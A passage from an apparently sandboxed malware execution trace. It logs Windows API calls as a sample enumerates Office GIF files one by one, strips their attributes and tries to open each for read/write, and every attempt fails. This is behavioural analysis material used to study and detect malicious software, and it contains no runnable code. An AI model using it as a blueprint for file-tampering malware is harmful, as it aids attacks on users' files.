dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.861] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14831_.GIF", dwFileAttributes=0x80) returned 0 [0135.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14831_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14831_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.861] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.862] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.862] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14832_.GIF", dwFileAttributes=0x80) returned 0 [0135.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14832_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14832_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.863] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.863] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.863] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.863] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF", dwFileAttributes=0x80) returned 0 [0135.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14833_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.863] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.863] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.863] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.863] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.864] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF", dwFileAttributes=0x80) returned 0 [0135.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14866_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.864] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.864] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.864] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.864] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF", dwFileAttributes=0x80) returned 0 [0135.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14867_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.865] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.865] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.865] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF", dwFileAttributes=0x80) returned 0 [0135.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14868_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.865] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.865] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.866] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.866] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF", dwFileAttributes=0x80) returned 0 [0135.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14869_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14869_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.866] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.866] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.866] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.866] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF", dwFileAttributes=0x80) returned 0 [0135.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14870_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14870_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.867] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.867] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.867] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.867] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.867] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF", dwFileAttributes=0x80) returned 0 [0135.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14871_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.868] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.868] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.868] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.868] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF", dwFileAttributes=0x80) returned 0 [0135.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14980_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.869] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.869] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.869] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF", dwFileAttributes=0x80) returned 0 [0135.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14981_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.869] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.869] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.870] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.870] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF", dwFileAttributes=0x80) returned 0 [0135.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14982_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14982_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.870] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.870] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.870] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.871] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14983_.GIF", dwFileAttributes=0x80) returned 0 [0135.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14983_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14983_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.871] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.871] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.871] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.871] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14984_.GIF", dwFileAttributes=0x80) returned 0 [0135.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14984_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14984_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.872] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.872] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.872] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.872] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.872] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14985_.GIF", dwFileAttributes=0x80) returned 0 [0135.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14985_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14985_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.873] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.873] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.873] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.873] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.873] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15018_.GIF", dwFileAttributes=0x80) returned 0 [0135.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15018_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15018_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.874] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.874] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.874] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.874] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15019_.GIF", dwFileAttributes=0x80) returned 0 [0135.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15019_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15019_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.874] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.874] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.875] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.875] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15020_.GIF", dwFileAttributes=0x80) returned 0 [0135.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15020_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15020_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.875] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.875] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.875] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.875] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15021_.GIF", dwFileAttributes=0x80) returned 0 [0135.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15021_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.876] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.876] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.876] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.876] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15022_.GIF", dwFileAttributes=0x80) returned 0 [0135.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15022_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15022_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.877] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.877] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.877] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.877] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15023_.GIF", dwFileAttributes=0x80) returned 0 [0135.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15023_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15023_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.877] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.877] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.878] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.878] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15056_.GIF", dwFileAttributes=0x80) returned 0 [0135.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15056_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15056_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.879] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.879] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.879] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.879] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15057_.GIF", dwFileAttributes=0x80) returned 0 [0135.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15057_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.879] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.879] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.879] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.879] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15058_.GIF", dwFileAttributes=0x80) returned 0 [0135.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15058_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15058_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.880] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.880] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.880] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15059_.GIF", dwFileAttributes=0x80) returned 0 [0135.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15059_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15059_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.880] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.880] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.880] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.881] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15060_.GIF", dwFileAttributes=0x80) returned 0 [0135.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15060_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15060_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.881] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.881] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.881] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.881] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15061_.GIF", dwFileAttributes=0x80) returned 0 [0135.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15061_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15061_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.882] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.882] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.882] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.882] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15132_.GIF", dwFileAttributes=0x80) returned 0 [0135.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15132_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15132_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.883] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.883] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.883] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.883] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.883] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15133_.GIF", dwFileAttributes=0x80) returned 0 [0135.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15133_.GIF" (normalized: "c:\\program files\\microsoft 